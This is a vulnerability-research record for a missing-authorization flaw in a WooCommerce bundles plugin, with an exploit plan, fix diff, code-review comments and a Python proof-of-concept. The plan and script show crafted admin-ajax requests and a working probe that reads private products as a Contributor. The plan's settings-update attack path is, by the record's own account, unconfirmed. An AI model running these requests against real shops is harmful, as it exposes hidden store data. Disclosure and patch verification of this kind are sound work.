[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVTnLTg3hHNFNYfKUJ2YxYoNSu-GDQj4S4ifcpZQP-pY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-32406","wpc-product-bundles-for-woocommerce-missing-authorization","WPC Product Bundles for WooCommerce \u003C= 8.4.5 - Missing Authorization","The WPC Product Bundles for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 8.4.5. 
This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action.","woo-product-bundle",null,"\u003C=8.4.5","8.4.6","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-22 00:00:00","2026-04-15 20:58:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd0693b76-dd6a-4ebc-8384-b7dadb606849?source=api-prod",53,[22,23,24,25],"includes\u002Fclass-woosb.php","languages\u002Fwoo-product-bundle.pot","readme.txt","wpc-product-bundles.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-32406\n\n## 1. Vulnerability Summary\nThe **WPC Product Bundles for WooCommerce** plugin (up to and including version 8.4.5) contains a **Missing Authorization** vulnerability. The AJAX handlers registered in `includes\u002Fclass-woosb.php` are reachable by any logged-in user through `admin-ajax.php` and do not verify the caller's capabilities themselves (no `current_user_can()` guard), so any authenticated user with at least **Contributor-level** access can reach functionality intended for shop managers.\n\nThe CVSS vector (I:L, Integrity Low) points to a state-changing action, so this plan treats the `woosb_update_search_settings` action as the primary hypothesis: it is assumed to let an attacker modify global plugin configuration related to the product search. This is a hypothesis to be confirmed against the source, not an established finding; the 8.4.5 to 8.4.6 diff is the final arbiter of which handler was actually fixed.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `woosb_update_search_settings` (as registered in `includes\u002Fclass-woosb.php` line 52).\n*   **Vulnerable Function:** `ajax_update_search_settings` in the `WPCleverWoosb` class.\n*   **Authentication Required:** Authenticated, **Contributor** role or higher.\n*   **Payload Parameter:** `settings` (assumed to be a URL-encoded string or an array of search configuration options; confirm the expected shape in the handler before sending).\n*   **Preconditions:** The plugin must be active, and a valid WordPress nonce for the action must be obtained (a nonce is a CSRF token, not an authorization check, so its presence does not close the hole).\n\n## 3. Code Flow\n1.  
**Entry Point:** The plugin registers AJAX hooks in `WPCleverWoosb::__construct`:\n    ```php\n    add_action( 'wp_ajax_woosb_update_search_settings', [ $this, 'ajax_update_search_settings' ] );\n    ```\n2.  **Missing Check:** `admin-ajax.php` only requires that the caller be logged in, so `ajax_update_search_settings` in `includes\u002Fclass-woosb.php` runs for a Contributor. The method itself performs no `current_user_can()` check, so nothing between the hook and the sink verifies the caller's role.\n3.  **Sink:** The function presumably processes the `$_POST['settings']` parameter and updates a WordPress option (e.g., `woosb_search_settings`) or user metadata using `update_option()` or `update_user_meta()`. Which of the two it is decides the impact: an option change is site-wide, a user-meta change affects only the attacker's own account.\n\n## 4. Nonce Acquisition Strategy\nThe plugin enqueues scripts for the backend in `admin_enqueue_scripts`. The nonce required for AJAX requests is typically localized into a JavaScript object via `wp_localize_script()`.\n\n1.  **Identify Variable:** WPClever plugins usually use the variable `woosb_vars`.\n2.  **Navigation:** Log in as a **Contributor** and navigate to any page where the plugin's admin scripts are loaded. Although Contributors have limited access, they can access the dashboard.\n3.  **Extraction:**\n    *   Navigate to: `\u002Fwp-admin\u002Findex.php` (Dashboard).\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        window.woosb_vars?.nonce\n        ```\n    *   If `woosb_vars` is not found on the dashboard, try `\u002Fwp-admin\u002Fedit.php?post_type=product`. A Contributor normally lacks WooCommerce's `edit_products` capability, so expect this screen to be refused; in that case search the page source of every admin screen the account can reach for `woosb_vars`, since the object only needs to be printed once wherever the plugin enqueues its backend script.\n\n## 5. Exploitation Strategy\n### Step 1: Data Setup\n1.  Create a user with the **Contributor** role.\n2.  Record the current value of the search settings via WP-CLI (the option name is assumed; confirm it in the handler, and if the value turns out to be stored per user, read it with `wp user meta get` instead):\n    ```bash\n    wp option get woosb_search_settings\n    ```\n\n### Step 2: Nonce Extraction\n1.  Log into the WordPress site as the Contributor via `browser_navigate`.\n2.  Execute `browser_eval` to retrieve `woosb_vars.nonce`.\n\n### Step 3: Trigger Unauthorized Setting Update\nSubmit a POST request from the Contributor session to modify the plugin's search behavior. 
We will attempt to change the `limit` or `search_sku` settings.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:** the shape of `settings` is an assumption, so two encodings are prepared. If the handler reads `settings` as a serialized query string, the inner string must be URL-encoded so that it arrives as one value (a bare `settings=limit=999&search_sku=yes` would deliver `settings=limit=999` plus two unrelated top-level parameters):\n    ```text\n    action=woosb_update_search_settings&nonce=[EXTRACTED_NONCE]&settings=limit%3D999%26search_sku%3Dyes%26search_exact%3Dyes\n    ```\n    If it reads an array, use PHP's bracket syntax instead:\n    ```text\n    action=woosb_update_search_settings&nonce=[EXTRACTED_NONCE]&settings[limit]=999&settings[search_sku]=yes&settings[search_exact]=yes\n    ```\n\n## 6. Test Data Setup\n*   **Plugin:** WPC Product Bundles for WooCommerce 8.4.5.\n*   **User:** Contributor (username: `attacker`, password: `password123`).\n*   **Configuration:** No special configuration is required as the vulnerability is in the default AJAX handler.\n\n## 7. Expected Results\n*   **Response:** The server should return a JSON success message (e.g., `{\"success\":true}`). A bare `0` or `-1` body means no handler is registered for the action or the nonce was rejected, not that authorization held.\n*   **State Change:** The global option `woosb_search_settings` should be updated to reflect the values provided in the payload.\n\n## 8. Verification Steps\n1.  **Verify via CLI:**\n    ```bash\n    wp option get woosb_search_settings\n    ```\n2.  **Check for Persistence:** The output should show the modified `limit` (999) and the other parameters injected during the exploit.\n3.  **Security Check:** Confirm that the user `attacker` (Contributor) does **not** have the `manage_options` capability (`wp cap list contributor` prints the role's capabilities), yet was able to change this setting.\n\n## 9. 
Alternative Approaches\nIf `woosb_update_search_settings` proves to be restricted to user-meta only (unlikely based on the plugin structure), target the second AJAX action:\n*   **Action:** `woosb_get_search_results`\n*   **Goal:** Information Disclosure.\n*   **Payload:** `action=woosb_get_search_results&nonce=[NONCE]&keyword=secret`\n*   **Success Criteria:** If this action returns products in `private` status which the Contributor should not be able to see, it confirms the Missing Authorization vulnerability for sensitive data retrieval. Drafts are out of scope here: the handler's query selects only `publish` and `private` rows, so a draft product will never appear regardless of the caller's role. Seed at least one private product whose title contains the keyword (e.g. `wp wc product create --name=\"secret bundle\" --status=private --user=1`, which needs WooCommerce's WP-CLI commands), and check with `wp post list --post_type=product --post_status=private --field=ID` that the IDs in the response belong to it.","The WPC Product Bundles for WooCommerce plugin for WordPress is vulnerable to information disclosure due to a missing per-result capability check in its AJAX product-search handler. This allows authenticated attackers with contributor-level permissions or higher to read data about products in `private` status that WooCommerce would otherwise hide from them. The 8.4.6 fix adds a `read_product` capability check to each product returned by `ajax_get_search_results`; the research plan's separate hypothesis that `woosb_update_search_settings` also lacks an authorization check is not confirmed by the fix diff, which does not touch that handler.","\u002F\u002F includes\u002Fclass-woosb.php line 52\nadd_action( 'wp_ajax_woosb_update_search_settings', [ $this, 'ajax_update_search_settings' ] );\nadd_action( 'wp_ajax_woosb_get_search_results', [ $this, 'ajax_get_search_results' ] );\n\n---\n\n\u002F\u002F includes\u002Fclass-woosb.php line 2482\n                if ( $query->have_posts() ) {\n                    while ( $query->have_posts() ) {\n                        $query->the_post();\n                        $_product = wc_get_product( get_the_ID() );\n\n                        if ( ! 
$_product ) {\n                            continue;\n                        }","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-product-bundle\u002F8.4.5\u002Fincludes\u002Fclass-woosb.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-product-bundle\u002F8.4.6\u002Fincludes\u002Fclass-woosb.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-product-bundle\u002F8.4.5\u002Fincludes\u002Fclass-woosb.php\t2026-02-10 10:27:46.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-product-bundle\u002F8.4.6\u002Fincludes\u002Fclass-woosb.php\t2026-02-11 09:16:18.000000000 +0000\n@@ -136,7 +136,7 @@\n             }\n \n             \u002F\u002F Admin order\n-            add_action( 'woocommerce_ajax_add_order_item_meta', [ $this, 'ajax_add_order_item_meta' ], 10, 3 );\n+            add_action( 'woocommerce_ajax_add_order_item_meta', [ $this, 'add_order_item_meta' ], 10, 3 );\n             add_filter( 'woocommerce_hidden_order_itemmeta', [ $this, 'hidden_order_itemmeta' ] );\n             add_action( 'woocommerce_before_order_itemmeta', [ $this, 'before_order_itemmeta' ], 10, 2 );\n \n@@ -2223,7 +2223,7 @@\n             }\n         }\n \n-        function ajax_add_order_item_meta( $order_item_id, $order_item, $order ) {\n+        function add_order_item_meta( $order_item_id, $order_item, $order ) {\n             $quantity = $order_item->get_quantity();\n \n             if ( 'line_item' === $order_item->get_type() ) {\n@@ -2445,10 +2445,10 @@\n                 }\n \n                 $query_args = [\n+                        's'              => $keyword,\n                         'is_woosb'       => true,\n                         'post_type'      => 'product',\n                         'post_status'    => [ 'publish', 'private' ],\n-                        's'              => $keyword,\n                       
  'posts_per_page' => $limit\n                 ];\n\n@@ -2482,7 +2482,7 @@\n                     $query->the_post();\n                     $_product = wc_get_product( get_the_ID() );\n \n-                    if ( ! $_product ) {\n+                    if ( ! $_product || ! current_user_can( 'read_product', $_product->get_id() ) ) {\n                         continue;\n                     }","The exploit targets the AJAX endpoints registered in the WPCleverWoosb class. An attacker first logs in with Contributor-level credentials and navigates to the WordPress dashboard to extract a valid security nonce from the localized 'woosb_vars' JavaScript object. Using this nonce, the attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the action set to 'woosb_update_search_settings' in an attempt to modify global plugin configuration (such as search limits or SKU matching); this path comes from the research plan and is not confirmed by the fix diff, which does not touch that handler. The path the fix diff does support is the 'woosb_get_search_results' action: given a search keyword, the Contributor receives products in 'private' status that WooCommerce would otherwise hide from that role, because the vulnerable loop emits every row WP_Query returns without a per-product 'read_product' check. Drafts are not exposed, since the query selects only 'publish' and 'private' rows. Version 8.4.6 adds the 'read_product' check and skips products the caller may not read.","gemini-3-flash-preview","2026-04-19 01:43:08","2026-04-19 01:43:33",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","8.4.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-product-bundle\u002Ftags\u002F8.4.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-product-bundle.8.4.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-product-bundle\u002Ftags\u002F8.4.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-product-bundle.8.4.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-product-bundle\u002Ftags"]
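Review bot: in the `// Admin order` hunk (@@ -136), renaming the `woocommerce_ajax_add_order_item_meta` callback from `ajax_add_order_item_meta` to `add_order_item_meta` (with the matching method rename at @@ -2223) has no authorization effect and is unrelated to the fix this security release ships; it also breaks any third-party code that calls the method by its old public name, and nothing in this diff adds an alias for it. Either keep a thin `ajax_add_order_item_meta( ...$args )` wrapper that forwards to `add_order_item_meta` for one release, or call out the rename in the changelog so integrators are not surprised by a fatal on upgrade.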
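Review bot: in the @@ -2445 hunk, moving `'s' => $keyword` to the top of `$query_args` changes nothing about the query, while the line that matters, `'post_status' => [ 'publish', 'private' ]`, is left as it was: the query still pulls private products for every caller and relies on a later per-row filter. Deciding the status list here instead, for example `'post_status' => current_user_can( 'read_private_products' ) ? [ 'publish', 'private' ] : [ 'publish' ]`, would keep private rows out of the result set for low-privileged callers before they are fetched, and would keep `posts_per_page` meaning what it says.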
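Review bot: in the @@ -2482 hunk, the added `current_user_can( 'read_product', $_product->get_id() )` is the only authorization check in this diff, and it runs after WP_Query has already selected up to `$limit` rows with `post_status` including `private`. Because non-readable products are skipped with `continue`, a Contributor gets fewer than `$limit` items exactly when private products match the keyword, so the response length still reveals whether (and roughly how many) private products match a given term even though their details are now withheld. Combine the per-row check with a status restriction in `$query_args`, or refill the page after filtering, so the response size does not depend on data the caller may not read. Note also that nothing in the diff touches the `woosb_update_search_settings` handler named in the research plan, so that hypothesis is not supported by the patch.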
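The section 9 probe above (extract `woosb_vars.nonce`, call `woosb_get_search_results` as a Contributor, compare the returned IDs with the site's private products) written out as a small script. This is an added example, not code from the research record or from the plugin. Two things it assumes because the page does not show them: the backend script prints `var woosb_vars = {"nonce": ...};` through `wp_localize_script()`, and the AJAX response is a JSON array of objects that carry a numeric `id`. The base URL and the `attacker` credentials are the plan's test values. The sample dashboard markup, result list and private-ID list are constructed so the nonce parser and the comparison can be exercised offline; `probe()` does the live exchange against a target.

```python
"""Offline-checkable helpers for the woosb_get_search_results probe (added example)."""
import http.cookiejar
import json
import re
import urllib.parse
import urllib.request
from typing import Iterable, List, Optional

# wp_localize_script() prints `var woosb_vars = {...};` inside a <script> tag;
# the object literal is JSON, so it can be decoded directly. (Assumed variable name.)
NONCE_RE = re.compile(r"var\s+woosb_vars\s*=\s*(\{.*?\});", re.S)

# Constructed sample data standing in for a real dashboard page and a real response.
SAMPLE_DASHBOARD = (
    '<script id="woosb-backend-js-extra">'
    'var woosb_vars = {"nonce":"9f86d081884c","ajax_url":"/wp-admin/admin-ajax.php"};'
    "</script>"
)
SAMPLE_RESULTS = [{"id": 101, "name": "Public bundle"}, {"id": 202, "name": "Secret bundle"}]
SAMPLE_PRIVATE_IDS = ["202", "303"]  # as printed by `wp post list ... --field=ID`


def extract_nonce(html: str) -> Optional[str]:
    """Return woosb_vars.nonce from an admin page, or None if it is not printed there."""
    match = NONCE_RE.search(html)
    if not match:
        return None
    try:
        return json.loads(match.group(1)).get("nonce")
    except json.JSONDecodeError:
        return None


def search_body(nonce: str, keyword: str) -> bytes:
    """Form body for the admin-ajax call from section 9 of the plan."""
    fields = {"action": "woosb_get_search_results", "nonce": nonce, "keyword": keyword}
    return urllib.parse.urlencode(fields).encode()


def leaked_private_ids(results: Iterable[dict], private_ids: Iterable[str]) -> List[int]:
    """Product IDs in the response that are private on the site.

    `private_ids` is ground truth taken from the target with
    `wp post list --post_type=product --post_status=private --field=ID`.
    A non-empty list from a Contributor session reproduces the leak; an empty
    list against 8.4.6 shows the per-row read_product check is effective.
    """
    private = {int(i) for i in private_ids}
    return sorted({int(r["id"]) for r in results if int(r["id"]) in private})


def wp_session(base: str, user: str, password: str) -> urllib.request.OpenerDirector:
    """Log in through wp-login.php and return an opener that carries the auth cookies."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    opener.open(base + "/wp-login.php")  # sets wordpress_test_cookie, required by testcookie=1
    form = {"log": user, "pwd": password, "wp-submit": "Log In",
            "redirect_to": base + "/wp-admin/", "testcookie": "1"}
    opener.open(base + "/wp-login.php", urllib.parse.urlencode(form).encode())
    return opener


def probe(base: str, user: str, password: str, keyword: str, private_ids: Iterable[str]) -> List[int]:
    """Live check: log in, pull the nonce from the dashboard, search, compare IDs."""
    opener = wp_session(base, user, password)
    html = opener.open(base + "/wp-admin/index.php").read().decode("utf-8", "replace")
    nonce = extract_nonce(html)
    if nonce is None:
        raise RuntimeError("woosb_vars.nonce not printed on the dashboard for this account")
    request = urllib.request.Request(
        base + "/wp-admin/admin-ajax.php",
        data=search_body(nonce, keyword),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    raw = opener.open(request).read()
    if raw in (b"0", b"-1"):  # no handler for the action / nonce rejected: not an authz result
        raise RuntimeError("admin-ajax returned %r" % raw)
    return leaked_private_ids(json.loads(raw), private_ids)


if __name__ == "__main__":
    # Offline dry run on the constructed sample data.
    print(extract_nonce(SAMPLE_DASHBOARD))                        # 9f86d081884c
    print(leaked_private_ids(SAMPLE_RESULTS, SAMPLE_PRIVATE_IDS))  # [202]
    # Live run, e.g.:
    # probe("http://localhost:8080", "attacker", "password123", "secret", ["202"])
```

Run the same `probe()` twice, once against 8.4.5 and once against 8.4.6 with the same seeded private product: the first call should return its ID, the second an empty list. Because the post-filter in 8.4.6 still shortens the result set when private products match, also compare the raw result count against `$limit` if you want to check the residual count leak.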